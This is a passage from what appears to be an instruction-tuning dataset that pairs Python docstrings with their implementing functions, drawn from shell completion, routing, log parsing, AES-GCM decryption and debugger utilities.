If there is only one completion, and it doesn't end with a **continuation character** (``/``, ``:``, or ``=``),
adds a space after the completion.
This method is exposed for overriding in subclasses; there is no need to use it directly.
"""
special_chars = "\\"
# If the word under the cursor was quoted, escape the quote char.
# Otherwise, escape all special characters and specially handle all COMP_WORDBREAKS chars.
if cword_prequote == "":
# Bash mangles completions which contain characters in COMP_WORDBREAKS.
# This workaround has the same effect as __ltrim_colon_completions in bash_completion
# (extended to characters other than the colon).
if last_wordbreak_pos:
completions = [c[last_wordbreak_pos + 1:] for c in completions]
special_chars += "();<>|&!`$* \t\n\"'"
elif cword_prequote == '"':
special_chars += '"`$!'
if os.environ.get("_ARGCOMPLETE_SHELL") == "tcsh":
# tcsh escapes special characters itself.
special_chars = ""
elif cword_prequote == "'":
# Nothing can be escaped in single quotes, so we need to close
# the string, escape the single quote, then open a new string.
special_chars = ""
completions = [c.replace("'", r"'\''") for c in completions]
for char in special_chars:
completions = [c.replace(char, "\\" + char) for c in completions]
if self.append_space:
# Similar functionality in bash was previously turned off by supplying the "-o nospace" option to complete.
# Now it is conditionally disabled using "compopt -o nospace" if the match ends in a continuation character.
# This code is retained for environments where this isn't done natively.
continuation_chars = "=/:"
if len(completions) == 1 and completions[0][-1] not in continuation_chars:
if cword_prequote == "":
completions[0] += " "
return completions | If the word under the cursor started with a quote (as indicated by a nonempty ``cword_prequote``), escapes
occurrences of that quote character in the completions, and adds the quote to the beginning of each completion.
Otherwise, escapes all characters that bash splits words on (``COMP_WORDBREAKS``), and removes portions of
completions before the first colon if (``COMP_WORDBREAKS``) contains a colon.
If there is only one completion, and it doesn't end with a **continuation character** (``/``, ``:``, or ``=``),
adds a space after the completion.
This method is exposed for overriding in subclasses; there is no need to use it directly. | Below is the instruction that describes the task:
### Input:
If the word under the cursor started with a quote (as indicated by a nonempty ``cword_prequote``), escapes
occurrences of that quote character in the completions, and adds the quote to the beginning of each completion.
Otherwise, escapes all characters that bash splits words on (``COMP_WORDBREAKS``), and removes portions of
completions before the first colon if (``COMP_WORDBREAKS``) contains a colon.
If there is only one completion, and it doesn't end with a **continuation character** (``/``, ``:``, or ``=``),
adds a space after the completion.
This method is exposed for overriding in subclasses; there is no need to use it directly.
### Response:
def quote_completions(self, completions, cword_prequote, last_wordbreak_pos):
"""
If the word under the cursor started with a quote (as indicated by a nonempty ``cword_prequote``), escapes
occurrences of that quote character in the completions, and adds the quote to the beginning of each completion.
Otherwise, escapes all characters that bash splits words on (``COMP_WORDBREAKS``), and removes portions of
completions before the first colon if (``COMP_WORDBREAKS``) contains a colon.
If there is only one completion, and it doesn't end with a **continuation character** (``/``, ``:``, or ``=``),
adds a space after the completion.
This method is exposed for overriding in subclasses; there is no need to use it directly.
"""
special_chars = "\\"
# If the word under the cursor was quoted, escape the quote char.
# Otherwise, escape all special characters and specially handle all COMP_WORDBREAKS chars.
if cword_prequote == "":
# Bash mangles completions which contain characters in COMP_WORDBREAKS.
# This workaround has the same effect as __ltrim_colon_completions in bash_completion
# (extended to characters other than the colon).
if last_wordbreak_pos:
completions = [c[last_wordbreak_pos + 1:] for c in completions]
special_chars += "();<>|&!`$* \t\n\"'"
elif cword_prequote == '"':
special_chars += '"`$!'
if os.environ.get("_ARGCOMPLETE_SHELL") == "tcsh":
# tcsh escapes special characters itself.
special_chars = ""
elif cword_prequote == "'":
# Nothing can be escaped in single quotes, so we need to close
# the string, escape the single quote, then open a new string.
special_chars = ""
completions = [c.replace("'", r"'\''") for c in completions]
for char in special_chars:
completions = [c.replace(char, "\\" + char) for c in completions]
if self.append_space:
# Similar functionality in bash was previously turned off by supplying the "-o nospace" option to complete.
# Now it is conditionally disabled using "compopt -o nospace" if the match ends in a continuation character.
# This code is retained for environments where this isn't done natively.
continuation_chars = "=/:"
if len(completions) == 1 and completions[0][-1] not in continuation_chars:
if cword_prequote == "":
completions[0] += " "
return completions |
def ensure_all_alt_ids_have_a_nest(nest_spec, list_elements, all_ids):
"""
Ensures that the alternative ids in `nest_spec` are all associated with
a nest. Raises a helpful ValueError if they are not.
Parameters
----------
nest_spec : OrderedDict, or None, optional.
Keys are strings that define the name of the nests. Values are lists of
alternative ids, denoting which alternatives belong to which nests.
Each alternative id must only be associated with a single nest!
Default == None.
list_elements : list of ints.
Each element should correspond to one of the alternatives identified as
belonging to a nest.
all_ids : list of ints.
Each element should correspond to one of the alternatives that is
present in the universal choice set for this model.
Returns
-------
None.
"""
unaccounted_alt_ids = []
for alt_id in all_ids:
if alt_id not in list_elements:
unaccounted_alt_ids.append(alt_id)
if unaccounted_alt_ids != []:
msg = "Associate the following alternative ids with a nest: {}"
raise ValueError(msg.format(unaccounted_alt_ids))
return None | Ensures that the alternative ids in `nest_spec` are all associated with
a nest. Raises a helpful ValueError if they are not.
Parameters
----------
nest_spec : OrderedDict, or None, optional.
Keys are strings that define the name of the nests. Values are lists of
alternative ids, denoting which alternatives belong to which nests.
Each alternative id must only be associated with a single nest!
Default == None.
list_elements : list of ints.
Each element should correspond to one of the alternatives identified as
belonging to a nest.
all_ids : list of ints.
Each element should correspond to one of the alternatives that is
present in the universal choice set for this model.
Returns
-------
None. | Below is the instruction that describes the task:
### Input:
Ensures that the alternative ids in `nest_spec` are all associated with
a nest. Raises a helpful ValueError if they are not.
Parameters
----------
nest_spec : OrderedDict, or None, optional.
Keys are strings that define the name of the nests. Values are lists of
alternative ids, denoting which alternatives belong to which nests.
Each alternative id must only be associated with a single nest!
Default == None.
list_elements : list of ints.
Each element should correspond to one of the alternatives identified as
belonging to a nest.
all_ids : list of ints.
Each element should correspond to one of the alternatives that is
present in the universal choice set for this model.
Returns
-------
None.
### Response:
def ensure_all_alt_ids_have_a_nest(nest_spec, list_elements, all_ids):
"""
Ensures that the alternative ids in `nest_spec` are all associated with
a nest. Raises a helpful ValueError if they are not.
Parameters
----------
nest_spec : OrderedDict, or None, optional.
Keys are strings that define the name of the nests. Values are lists of
alternative ids, denoting which alternatives belong to which nests.
Each alternative id must only be associated with a single nest!
Default == None.
list_elements : list of ints.
Each element should correspond to one of the alternatives identified as
belonging to a nest.
all_ids : list of ints.
Each element should correspond to one of the alternatives that is
present in the universal choice set for this model.
Returns
-------
None.
"""
unaccounted_alt_ids = []
for alt_id in all_ids:
if alt_id not in list_elements:
unaccounted_alt_ids.append(alt_id)
if unaccounted_alt_ids != []:
msg = "Associate the following alternative ids with a nest: {}"
raise ValueError(msg.format(unaccounted_alt_ids))
return None |
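A short usage sketch for the check above (assuming ensure_all_alt_ids_have_a_nest as defined is in scope, with made-up ids): nests cover ids 1 and 2 but not 3, so the call raises a ValueError naming the missing id.
from collections import OrderedDict

nest_spec = OrderedDict([('fast', [1]), ('slow', [2])])
list_elements = [1, 2]      # every alternative id referenced by a nest
all_ids = [1, 2, 3]         # universal choice set
try:
    ensure_all_alt_ids_have_a_nest(nest_spec, list_elements, all_ids)
except ValueError as e:
    print(e)  # Associate the following alternative ids with a nest: [3]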
def load_raw(raw_pickle_file):
"""
Load a pickle file of raw recordings.
Parameters
----------
raw_pickle_file : str
Path to a pickle file which contains raw recordings.
Returns
-------
dict
The loaded pickle file.
"""
with open(raw_pickle_file, 'rb') as f:
raw = pickle.load(f)
logging.info("Loaded %i recordings.", len(raw['handwriting_datasets']))
return raw | Load a pickle file of raw recordings.
Parameters
----------
raw_pickle_file : str
Path to a pickle file which contains raw recordings.
Returns
-------
dict
The loaded pickle file. | Below is the instruction that describes the task:
### Input:
Load a pickle file of raw recordings.
Parameters
----------
raw_pickle_file : str
Path to a pickle file which contains raw recordings.
Returns
-------
dict
The loaded pickle file.
### Response:
def load_raw(raw_pickle_file):
"""
Load a pickle file of raw recordings.
Parameters
----------
raw_pickle_file : str
Path to a pickle file which contains raw recordings.
Returns
-------
dict
The loaded pickle file.
"""
with open(raw_pickle_file, 'rb') as f:
raw = pickle.load(f)
logging.info("Loaded %i recordings.", len(raw['handwriting_datasets']))
return raw |
def routing_tree_to_tables(routes, net_keys):
"""Convert a set of
:py:class:`~rig.place_and_route.routing_tree.RoutingTree` s into a per-chip
set of routing tables.
.. warning::
A :py:exc:`rig.routing_table.MultisourceRouteError` will
be raised if entries with identical keys and masks but with differing
routes are generated. This is not a perfect test, entries which would
otherwise collide are not spotted.
.. warning::
The routing trees provided are assumed to be correct and continuous
(not missing any hops). If this is not the case, the output is
undefined.
.. note::
If a routing tree has a terminating vertex whose route is set to None,
that vertex is ignored.
Parameters
----------
routes : {net: :py:class:`~rig.place_and_route.routing_tree.RoutingTree`, \
...}
The complete set of RoutingTrees representing all routes in the system.
(Note: this is the same data structure produced by routers in the
:py:mod:`~rig.place_and_route` module.)
net_keys : {net: (key, mask), ...}
The key and mask associated with each net.
Returns
-------
{(x, y): [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
"""
# Pairs of inbound and outbound routes.
InOutPair = namedtuple("InOutPair", "ins, outs")
# {(x, y): {(key, mask): _InOutPair}}
route_sets = defaultdict(OrderedDict)
for net, routing_tree in iteritems(routes):
key, mask = net_keys[net]
# The direction is the Links entry which describes the direction in
# which we last moved to reach the node (or None for the root).
for direction, (x, y), out_directions in routing_tree.traverse():
# Determine the in_direction
in_direction = direction
if in_direction is not None:
in_direction = direction.opposite
# Add a routing entry
if (key, mask) in route_sets[(x, y)]:
# If there is an existing route set raise an error if the out
# directions are not equivalent.
if route_sets[(x, y)][(key, mask)].outs != out_directions:
raise MultisourceRouteError(key, mask, (x, y))
# Otherwise, add the input directions as this represents a
# merge of the routes.
route_sets[(x, y)][(key, mask)].ins.add(in_direction)
else:
# Otherwise create a new route set
route_sets[(x, y)][(key, mask)] = \
InOutPair({in_direction}, set(out_directions))
# Construct the routing tables from the route sets
routing_tables = defaultdict(list)
for (x, y), routes in iteritems(route_sets):
for (key, mask), route in iteritems(routes):
# Add the route
routing_tables[(x, y)].append(
RoutingTableEntry(route.outs, key, mask, route.ins)
)
return routing_tables | Convert a set of
:py:class:`~rig.place_and_route.routing_tree.RoutingTree` s into a per-chip
set of routing tables.
.. warning::
A :py:exc:`rig.routing_table.MultisourceRouteError` will
be raised if entries with identical keys and masks but with differing
routes are generated. This is not a perfect test, entries which would
otherwise collide are not spotted.
.. warning::
The routing trees provided are assumed to be correct and continuous
(not missing any hops). If this is not the case, the output is
undefined.
.. note::
If a routing tree has a terminating vertex whose route is set to None,
that vertex is ignored.
Parameters
----------
routes : {net: :py:class:`~rig.place_and_route.routing_tree.RoutingTree`, \
...}
The complete set of RoutingTrees representing all routes in the system.
(Note: this is the same data structure produced by routers in the
:py:mod:`~rig.place_and_route` module.)
net_keys : {net: (key, mask), ...}
The key and mask associated with each net.
Returns
-------
{(x, y): [:py:class:`~rig.routing_table.RoutingTableEntry`, ...] | Below is the instruction that describes the task:
### Input:
Convert a set of
:py:class:`~rig.place_and_route.routing_tree.RoutingTree` s into a per-chip
set of routing tables.
.. warning::
A :py:exc:`rig.routing_table.MultisourceRouteError` will
be raised if entries with identical keys and masks but with differing
routes are generated. This is not a perfect test, entries which would
otherwise collide are not spotted.
.. warning::
The routing trees provided are assumed to be correct and continuous
(not missing any hops). If this is not the case, the output is
undefined.
.. note::
If a routing tree has a terminating vertex whose route is set to None,
that vertex is ignored.
Parameters
----------
routes : {net: :py:class:`~rig.place_and_route.routing_tree.RoutingTree`, \
...}
The complete set of RoutingTrees representing all routes in the system.
(Note: this is the same data structure produced by routers in the
:py:mod:`~rig.place_and_route` module.)
net_keys : {net: (key, mask), ...}
The key and mask associated with each net.
Returns
-------
{(x, y): [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
### Response:
def routing_tree_to_tables(routes, net_keys):
"""Convert a set of
:py:class:`~rig.place_and_route.routing_tree.RoutingTree` s into a per-chip
set of routing tables.
.. warning::
A :py:exc:`rig.routing_table.MultisourceRouteError` will
be raised if entries with identical keys and masks but with differing
routes are generated. This is not a perfect test, entries which would
otherwise collide are not spotted.
.. warning::
The routing trees provided are assumed to be correct and continuous
(not missing any hops). If this is not the case, the output is
undefined.
.. note::
If a routing tree has a terminating vertex whose route is set to None,
that vertex is ignored.
Parameters
----------
routes : {net: :py:class:`~rig.place_and_route.routing_tree.RoutingTree`, \
...}
The complete set of RoutingTrees representing all routes in the system.
(Note: this is the same data structure produced by routers in the
:py:mod:`~rig.place_and_route` module.)
net_keys : {net: (key, mask), ...}
The key and mask associated with each net.
Returns
-------
{(x, y): [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
"""
# Pairs of inbound and outbound routes.
InOutPair = namedtuple("InOutPair", "ins, outs")
# {(x, y): {(key, mask): _InOutPair}}
route_sets = defaultdict(OrderedDict)
for net, routing_tree in iteritems(routes):
key, mask = net_keys[net]
# The direction is the Links entry which describes the direction in
# which we last moved to reach the node (or None for the root).
for direction, (x, y), out_directions in routing_tree.traverse():
# Determine the in_direction
in_direction = direction
if in_direction is not None:
in_direction = direction.opposite
# Add a routing entry
if (key, mask) in route_sets[(x, y)]:
# If there is an existing route set raise an error if the out
# directions are not equivalent.
if route_sets[(x, y)][(key, mask)].outs != out_directions:
raise MultisourceRouteError(key, mask, (x, y))
# Otherwise, add the input directions as this represents a
# merge of the routes.
route_sets[(x, y)][(key, mask)].ins.add(in_direction)
else:
# Otherwise create a new route set
route_sets[(x, y)][(key, mask)] = \
InOutPair({in_direction}, set(out_directions))
# Construct the routing tables from the route sets
routing_tables = defaultdict(list)
for (x, y), routes in iteritems(route_sets):
for (key, mask), route in iteritems(routes):
# Add the route
routing_tables[(x, y)].append(
RoutingTableEntry(route.outs, key, mask, route.ins)
)
return routing_tables |
def _schedule_log_parsing(job, job_logs, result):
"""Kick off the initial task that parses the log data.
log_data is a list of job log objects and the result for that job
"""
# importing here to avoid an import loop
from treeherder.log_parser.tasks import parse_logs
task_types = {
"errorsummary_json",
"buildbot_text",
"builds-4h"
}
job_log_ids = []
for job_log in job_logs:
# a log can be submitted already parsed. So only schedule
# a parsing task if it's ``pending``
# the submitter is then responsible for submitting the
# text_log_summary artifact
if job_log.status != JobLog.PENDING:
continue
# if this is not a known type of log, abort parse
if job_log.name not in task_types:
continue
job_log_ids.append(job_log.id)
# TODO: Replace the use of different queues for failures vs not with the
# RabbitMQ priority feature (since the idea behind separate queues was
# only to ensure failures are dealt with first if there is a backlog).
if result != 'success':
queue = 'log_parser_fail'
priority = 'failures'
else:
queue = 'log_parser'
priority = "normal"
parse_logs.apply_async(queue=queue,
args=[job.id, job_log_ids, priority]) | Kick off the initial task that parses the log data.
log_data is a list of job log objects and the result for that job | Below is the instruction that describes the task:
### Input:
Kick off the initial task that parses the log data.
log_data is a list of job log objects and the result for that job
### Response:
def _schedule_log_parsing(job, job_logs, result):
"""Kick off the initial task that parses the log data.
log_data is a list of job log objects and the result for that job
"""
# importing here to avoid an import loop
from treeherder.log_parser.tasks import parse_logs
task_types = {
"errorsummary_json",
"buildbot_text",
"builds-4h"
}
job_log_ids = []
for job_log in job_logs:
# a log can be submitted already parsed. So only schedule
# a parsing task if it's ``pending``
# the submitter is then responsible for submitting the
# text_log_summary artifact
if job_log.status != JobLog.PENDING:
continue
# if this is not a known type of log, abort parse
if job_log.name not in task_types:
continue
job_log_ids.append(job_log.id)
# TODO: Replace the use of different queues for failures vs not with the
# RabbitMQ priority feature (since the idea behind separate queues was
# only to ensure failures are dealt with first if there is a backlog).
if result != 'success':
queue = 'log_parser_fail'
priority = 'failures'
else:
queue = 'log_parser'
priority = "normal"
parse_logs.apply_async(queue=queue,
args=[job.id, job_log_ids, priority]) |
def auto(self):
"""Returns the highest whole-number unit."""
if self._value >= 1099511627776:
return self.TiB, 'TiB'
if self._value >= 1073741824:
return self.GiB, 'GiB'
if self._value >= 1048576:
return self.MiB, 'MiB'
if self._value >= 1024:
return self.KiB, 'KiB'
else:
return self.B, 'B' | Returns the highest whole-number unit. | Below is the instruction that describes the task:
### Input:
Returns the highest whole-number unit.
### Response:
def auto(self):
"""Returns the highest whole-number unit."""
if self._value >= 1099511627776:
return self.TiB, 'TiB'
if self._value >= 1073741824:
return self.GiB, 'GiB'
if self._value >= 1048576:
return self.MiB, 'MiB'
if self._value >= 1024:
return self.KiB, 'KiB'
else:
return self.B, 'B' |
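The threshold logic above can be sketched as a plain function, since the enclosing class and its unit attributes are not shown here; auto_unit is a hypothetical name and the snippet simply picks the largest binary unit that fits at least once into the value.
def auto_unit(num_bytes):
    # Largest-first thresholds, mirroring the method above.
    for factor, label in ((1099511627776, 'TiB'), (1073741824, 'GiB'),
                          (1048576, 'MiB'), (1024, 'KiB')):
        if num_bytes >= factor:
            return num_bytes / factor, label
    return num_bytes, 'B'

print(auto_unit(1536))        # (1.5, 'KiB')
print(auto_unit(1073741824))  # (1.0, 'GiB')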
def async_update(self, event):
"""New event for light.
Check that state is part of event.
Signal that light has updated state.
"""
self.update_attr(event.get('state', {}))
super().async_update(event) | New event for light.
Check that state is part of event.
Signal that light has updated state. | Below is the instruction that describes the task:
### Input:
New event for light.
Check that state is part of event.
Signal that light has updated state.
### Response:
def async_update(self, event):
"""New event for light.
Check that state is part of event.
Signal that light has updated state.
"""
self.update_attr(event.get('state', {}))
super().async_update(event) |
def rotate(self):
'''Move the first address to the last position.'''
item = self._address_infos.pop(0)
self._address_infos.append(item) | Move the first address to the last position. | Below is the instruction that describes the task:
### Input:
Move the first address to the last position.
### Response:
def rotate(self):
'''Move the first address to the last position.'''
item = self._address_infos.pop(0)
self._address_infos.append(item) |
def ip_addresses_from_xff(value: str) -> List[str]:
"""
Returns a list of IP addresses (as strings), given the value of an HTTP
``X-Forwarded-For`` (or ``WSGI HTTP_X_FORWARDED_FOR``) header.
Args:
value:
the value of an HTTP ``X-Forwarded-For`` (or ``WSGI
HTTP_X_FORWARDED_FOR``) header
Returns:
        a list of IP addresses as strings
See:
- https://en.wikipedia.org/wiki/X-Forwarded-For
- https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For # noqa
- NOT THIS: http://tools.ietf.org/html/rfc7239
"""
if not value:
return []
return [x.strip() for x in value.split(",")] | Returns a list of IP addresses (as strings), given the value of an HTTP
``X-Forwarded-For`` (or ``WSGI HTTP_X_FORWARDED_FOR``) header.
Args:
value:
the value of an HTTP ``X-Forwarded-For`` (or ``WSGI
HTTP_X_FORWARDED_FOR``) header
Returns:
        a list of IP addresses as strings
See:
- https://en.wikipedia.org/wiki/X-Forwarded-For
- https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For # noqa
- NOT THIS: http://tools.ietf.org/html/rfc7239 | Below is the the instruction that describes the task:
### Input:
Returns a list of IP addresses (as strings), given the value of an HTTP
``X-Forwarded-For`` (or ``WSGI HTTP_X_FORWARDED_FOR``) header.
Args:
value:
the value of an HTTP ``X-Forwarded-For`` (or ``WSGI
HTTP_X_FORWARDED_FOR``) header
Returns:
        a list of IP addresses as strings
See:
- https://en.wikipedia.org/wiki/X-Forwarded-For
- https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For # noqa
- NOT THIS: http://tools.ietf.org/html/rfc7239
### Response:
def ip_addresses_from_xff(value: str) -> List[str]:
"""
Returns a list of IP addresses (as strings), given the value of an HTTP
``X-Forwarded-For`` (or ``WSGI HTTP_X_FORWARDED_FOR``) header.
Args:
value:
the value of an HTTP ``X-Forwarded-For`` (or ``WSGI
HTTP_X_FORWARDED_FOR``) header
Returns:
        a list of IP addresses as strings
See:
- https://en.wikipedia.org/wiki/X-Forwarded-For
- https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For # noqa
- NOT THIS: http://tools.ietf.org/html/rfc7239
"""
if not value:
return []
return [x.strip() for x in value.split(",")] |
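For reference, a quick usage sketch of ip_addresses_from_xff; the header value below is made up.
header = "203.0.113.195, 70.41.3.18 , 150.172.238.178"
print(ip_addresses_from_xff(header))   # ['203.0.113.195', '70.41.3.18', '150.172.238.178']
print(ip_addresses_from_xff(""))       # []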
def flush(self):
"""Ensure all logging output has been flushed."""
if self.shutdown:
return
self.flush_buffers(force=True)
self.queue.put(FLUSH_MARKER)
self.queue.join() | Ensure all logging output has been flushed. | Below is the the instruction that describes the task:
### Input:
Ensure all logging output has been flushed.
### Response:
def flush(self):
"""Ensure all logging output has been flushed."""
if self.shutdown:
return
self.flush_buffers(force=True)
self.queue.put(FLUSH_MARKER)
self.queue.join() |
def get_doctypes(self, default_doctypes=None):
"""Returns the doctypes (or mapping type names) to use."""
doctypes = self.type.get_mapping_type_name()
if isinstance(doctypes, six.string_types):
doctypes = [doctypes]
return super(S, self).get_doctypes(default_doctypes=doctypes) | Returns the doctypes (or mapping type names) to use. | Below is the the instruction that describes the task:
### Input:
Returns the doctypes (or mapping type names) to use.
### Response:
def get_doctypes(self, default_doctypes=None):
"""Returns the doctypes (or mapping type names) to use."""
doctypes = self.type.get_mapping_type_name()
if isinstance(doctypes, six.string_types):
doctypes = [doctypes]
return super(S, self).get_doctypes(default_doctypes=doctypes) |
def _queryset_iterator(qs):
"""
Override default iterator to wrap returned items in a publishing
sanity-checker "booby trap" to lazily raise an exception if DRAFT
items are mistakenly returned and mis-used in a public context
where only PUBLISHED items should be used.
This booby trap is added when all of:
- the publishing middleware is active, and therefore able to report
accurately whether the request is in a drafts-permitted context
- the publishing middleware tells us we are not in
a drafts-permitted context, which means only published items
should be used.
"""
# Avoid double-processing draft items in our custom iterator when we
# are in a `PublishingQuerySet` that is also a subclass of the
# monkey-patched `UrlNodeQuerySet`
if issubclass(type(qs), UrlNodeQuerySet):
super_without_boobytrap_iterator = super(UrlNodeQuerySet, qs)
else:
super_without_boobytrap_iterator = super(PublishingQuerySet, qs)
if is_publishing_middleware_active() \
and not is_draft_request_context():
for item in super_without_boobytrap_iterator.iterator():
if getattr(item, 'publishing_is_draft', False):
yield DraftItemBoobyTrap(item)
else:
yield item
else:
for item in super_without_boobytrap_iterator.iterator():
yield item | Override default iterator to wrap returned items in a publishing
sanity-checker "booby trap" to lazily raise an exception if DRAFT
items are mistakenly returned and mis-used in a public context
where only PUBLISHED items should be used.
This booby trap is added when all of:
- the publishing middleware is active, and therefore able to report
accurately whether the request is in a drafts-permitted context
- the publishing middleware tells us we are not in
a drafts-permitted context, which means only published items
should be used. | Below is the the instruction that describes the task:
### Input:
Override default iterator to wrap returned items in a publishing
sanity-checker "booby trap" to lazily raise an exception if DRAFT
items are mistakenly returned and mis-used in a public context
where only PUBLISHED items should be used.
This booby trap is added when all of:
- the publishing middleware is active, and therefore able to report
accurately whether the request is in a drafts-permitted context
- the publishing middleware tells us we are not in
a drafts-permitted context, which means only published items
should be used.
### Response:
def _queryset_iterator(qs):
"""
Override default iterator to wrap returned items in a publishing
sanity-checker "booby trap" to lazily raise an exception if DRAFT
items are mistakenly returned and mis-used in a public context
where only PUBLISHED items should be used.
This booby trap is added when all of:
- the publishing middleware is active, and therefore able to report
accurately whether the request is in a drafts-permitted context
- the publishing middleware tells us we are not in
a drafts-permitted context, which means only published items
should be used.
"""
# Avoid double-processing draft items in our custom iterator when we
# are in a `PublishingQuerySet` that is also a subclass of the
# monkey-patched `UrlNodeQuerySet`
if issubclass(type(qs), UrlNodeQuerySet):
super_without_boobytrap_iterator = super(UrlNodeQuerySet, qs)
else:
super_without_boobytrap_iterator = super(PublishingQuerySet, qs)
if is_publishing_middleware_active() \
and not is_draft_request_context():
for item in super_without_boobytrap_iterator.iterator():
if getattr(item, 'publishing_is_draft', False):
yield DraftItemBoobyTrap(item)
else:
yield item
else:
for item in super_without_boobytrap_iterator.iterator():
yield item |
def imbound(clspatch, *args, **kwargs):
"""
:param clspatch:
:param args:
:param kwargs:
:return:
"""
# todo : add example
c = kwargs.pop('color', kwargs.get('edgecolor', None))
kwargs.update(facecolor='none', edgecolor=c)
return impatch(clspatch, *args, **kwargs) | :param clspatch:
:param args:
:param kwargs:
:return: | Below is the the instruction that describes the task:
### Input:
:param clspatch:
:param args:
:param kwargs:
:return:
### Response:
def imbound(clspatch, *args, **kwargs):
"""
:param clspatch:
:param args:
:param kwargs:
:return:
"""
# todo : add example
c = kwargs.pop('color', kwargs.get('edgecolor', None))
kwargs.update(facecolor='none', edgecolor=c)
return impatch(clspatch, *args, **kwargs) |
def parse_arguments(args):
'''Parse arguments from the command line'''
parser = argparse.ArgumentParser(description='Convert JAMS to .lab files')
parser.add_argument('-c',
'--comma-separated',
dest='csv',
action='store_true',
default=False,
help='Output in .csv instead of .lab')
parser.add_argument('--comment', dest='comment_char', type=str, default='#',
help='Comment character')
parser.add_argument('-n',
'--namespace',
dest='namespaces',
nargs='+',
default=['.*'],
help='One or more namespaces to output. Default is all.')
parser.add_argument('jams_file',
help='Path to the input jams file')
parser.add_argument('output_prefix', help='Prefix for output files')
return vars(parser.parse_args(args)) | Parse arguments from the command line | Below is the the instruction that describes the task:
### Input:
Parse arguments from the command line
### Response:
def parse_arguments(args):
'''Parse arguments from the command line'''
parser = argparse.ArgumentParser(description='Convert JAMS to .lab files')
parser.add_argument('-c',
'--comma-separated',
dest='csv',
action='store_true',
default=False,
help='Output in .csv instead of .lab')
parser.add_argument('--comment', dest='comment_char', type=str, default='#',
help='Comment character')
parser.add_argument('-n',
'--namespace',
dest='namespaces',
nargs='+',
default=['.*'],
help='One or more namespaces to output. Default is all.')
parser.add_argument('jams_file',
help='Path to the input jams file')
parser.add_argument('output_prefix', help='Prefix for output files')
return vars(parser.parse_args(args)) |
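A minimal invocation sketch for the parser above; the file name and output prefix are placeholders.
opts = parse_arguments(['-c', 'song.jams', 'out/song'])
# opts -> {'csv': True, 'comment_char': '#', 'namespaces': ['.*'],
#          'jams_file': 'song.jams', 'output_prefix': 'out/song'}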
def polar_direction_xyz(self):
"""
get current polar direction in Roche (xyz) coordinates
"""
return mesh.spin_in_roche(self.polar_direction_uvw,
self.true_anom, self.elongan, self.eincl).astype(float) | get current polar direction in Roche (xyz) coordinates | Below is the the instruction that describes the task:
### Input:
get current polar direction in Roche (xyz) coordinates
### Response:
def polar_direction_xyz(self):
"""
get current polar direction in Roche (xyz) coordinates
"""
return mesh.spin_in_roche(self.polar_direction_uvw,
self.true_anom, self.elongan, self.eincl).astype(float) |
def decrypt(self, k, a, iv, e, t):
""" Decrypt accoriding to the selected encryption and hashing
functions.
:param k: Encryption key (optional)
:param a: Additional Authenticated Data
:param iv: Initialization Vector
:param e: Ciphertext
:param t: Authentication Tag
Returns plaintext or raises an error
"""
cipher = Cipher(algorithms.AES(k), modes.GCM(iv, t),
backend=self.backend)
decryptor = cipher.decryptor()
decryptor.authenticate_additional_data(a)
        return decryptor.update(e) + decryptor.finalize() | Decrypt according to the selected encryption and hashing
functions.
:param k: Encryption key (optional)
:param a: Additional Authenticated Data
:param iv: Initialization Vector
:param e: Ciphertext
:param t: Authentication Tag
Returns plaintext or raises an error | Below is the the instruction that describes the task:
### Input:
Decrypt according to the selected encryption and hashing
functions.
:param k: Encryption key (optional)
:param a: Additional Authenticated Data
:param iv: Initialization Vector
:param e: Ciphertext
:param t: Authentication Tag
Returns plaintext or raises an error
### Response:
def decrypt(self, k, a, iv, e, t):
""" Decrypt accoriding to the selected encryption and hashing
functions.
:param k: Encryption key (optional)
:param a: Additional Authenticated Data
:param iv: Initialization Vector
:param e: Ciphertext
:param t: Authentication Tag
Returns plaintext or raises an error
"""
cipher = Cipher(algorithms.AES(k), modes.GCM(iv, t),
backend=self.backend)
decryptor = cipher.decryptor()
decryptor.authenticate_additional_data(a)
return decryptor.update(e) + decryptor.finalize() |
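For context, a sketch of the matching AES-GCM encryption step with the cryptography package, showing where the k, a, iv, e and t arguments of decrypt() come from; the key size, nonce length and payload are arbitrary choices.
import os
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
k = os.urandom(16)                                  # AES-128 key
iv = os.urandom(12)                                 # 96-bit nonce, common for GCM
a = b"protected header"                             # additional authenticated data
encryptor = Cipher(algorithms.AES(k), modes.GCM(iv),
                   backend=default_backend()).encryptor()
encryptor.authenticate_additional_data(a)
e = encryptor.update(b"attack at dawn") + encryptor.finalize()
t = encryptor.tag                                   # tag later verified by decrypt(k, a, iv, e, t)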
def do_register(self, arg):
"""
    [~thread] r - print the value of all registers
    [~thread] r <register> - print the value of a register
    [~thread] r <register>=<value> - change the value of a register
    [~thread] register - print the value of all registers
    [~thread] register <register> - print the value of a register
[~thread] register <register>=<value> - change the value of a register
"""
arg = arg.strip()
if not arg:
self.print_current_location()
else:
equ = arg.find('=')
if equ >= 0:
register = arg[:equ].strip()
value = arg[equ+1:].strip()
if not value:
value = '0'
self.change_register(register, value)
else:
value = self.input_register(arg)
if value is None:
raise CmdError("unknown register: %s" % arg)
try:
label = None
thread = self.get_thread_from_prefix()
process = thread.get_process()
module = process.get_module_at_address(value)
if module:
label = module.get_label_at_address(value)
except RuntimeError:
label = None
reg = arg.upper()
val = HexDump.address(value)
if label:
print("%s: %s (%s)" % (reg, val, label))
else:
print("%s: %s" % (reg, val)) | [~thread] r - print(the value of all registers
[~thread] r <register> - print(the value of a register
[~thread] r <register>=<value> - change the value of a register
[~thread] register - print(the value of all registers
[~thread] register <register> - print(the value of a register
[~thread] register <register>=<value> - change the value of a register | Below is the the instruction that describes the task:
### Input:
[~thread] r - print the value of all registers
    [~thread] r <register> - print the value of a register
    [~thread] r <register>=<value> - change the value of a register
    [~thread] register - print the value of all registers
    [~thread] register <register> - print the value of a register
[~thread] register <register>=<value> - change the value of a register
### Response:
def do_register(self, arg):
"""
    [~thread] r - print the value of all registers
    [~thread] r <register> - print the value of a register
    [~thread] r <register>=<value> - change the value of a register
    [~thread] register - print the value of all registers
    [~thread] register <register> - print the value of a register
[~thread] register <register>=<value> - change the value of a register
"""
arg = arg.strip()
if not arg:
self.print_current_location()
else:
